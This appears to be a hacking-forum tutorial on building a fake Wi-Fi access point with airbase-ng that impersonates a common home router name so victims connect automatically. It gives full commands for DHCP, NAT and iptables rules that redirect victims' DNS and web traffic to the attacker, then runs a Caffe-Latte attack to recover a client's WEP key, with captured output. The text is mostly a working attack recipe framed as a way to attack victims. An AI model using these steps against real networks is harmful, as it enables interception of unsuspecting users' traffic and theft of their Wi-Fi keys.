Fake AP Airbase-ng

This tutorial i will show you how to set up a simple fake AP with airbase-ng This can be used for multiple reasons like attacking non associated victims forcing them to automatic connect to ur AP thinking it is their own legit AP the first thing we will need to do is set up airbase-ng

Code:

airbase-ng -e BTHomeHub2 -c 1 wlan0

Options:
-e Essid For AP
-c Channel Number
wlan0 Wireless Interface
This will then create a tap device like below

Code:

root@bt:~# airbase-ng -e BTHomeHub2 -c 1 wlan0 
08:15:24  Created tap interface at0
08:15:24  Trying to set MTU on at0 to 1500
08:15:24  Trying to set MTU on wlan0 to 1800
08:15:24  Access Point with BSSID 00:C0:CA:47:32:24 started.

airbase-ng Options
-e Essid
-c Channel Number
wlan0 wireless interface
Now that we have the ap running we need to make it so the clients can obtain a ip address so lets set up are ip tables

Code:

ifconfig at0 up 
ifconfig at0 192.168.1.254 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.254

Now that we have are ip tables set for the client we need to configure are dhcp3 server a little
here is my dhcp.conf

Code:

ddns-update-style ad-hoc; 
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.1.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.1.255;
option routers 192.168.1.254;
option domain-name-servers home;
range 192.168.1.1 192.168.1.140;
}

just simply add this to the bottom of ur /etc/dhcp3/dhcp.conf
Once that has been entered & saved dhcp server can be started

Code:

/etc/init.d/dhcp3-server start

Now all we have left to do is to configure the routing table for the AP

Code:

iptables –flush 
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
iptables –table nat –append POSTROUTING –out-interface wlan0 -j MASQUERADE
iptables –append FORWARD –in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -j DNAT –to 192.168.1.254
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000
echo 1 > /proc/sys/net/ipv4/ip_forward

Now you should have a fully functional Fake ap if you would like to have this fake ap run the caffe-latte attack just add to the airbase-ng -L -W 1 -x 150 for example

Code:

airbase-ng -L -W 1 -x 150 -e BTHomeHub2 -c 1 wlan0

My Output

Code:

root@bt:~# airbase-ng -L -W 1 -x 150 -e BTHomeHub2 -c 1 wlan0 
08:33:13  Created tap interface at0
08:33:13  Trying to set MTU on at0 to 1500
08:33:13  Access Point with BSSID 00:C0:CA:47:32:24 started.
08:33:22  Client 00:1F:1F:14:4D:6B associated (WEP) to ESSID: “BTHomeHub2″
08:33:32  Client 00:1F:1F:14:4D:6B associated (WEP) to ESSID: “BTHomeHub2″
08:33:32  Starting Caffe-Latte attack against 00:1F:1F:14:4D:6B at 150 pps.

airbase-ng Options
-L caffe-latte attack
-L WEP encrytion on
-x Number of packets to send
-e Essid
-c channel Number
wlan0 wireless interface
The only problem is that I haven’t managed to get the caffe-latte attack fully working due to the fact that the only time it captures Iv correctly is when the client reconnects to the ap so the only way ivs had caffe-latte working kind of well is to DE authenticate the client every 10 seconds.
Visit Root Developpers
And Facebook Page : https://www.facebook.com/root.develop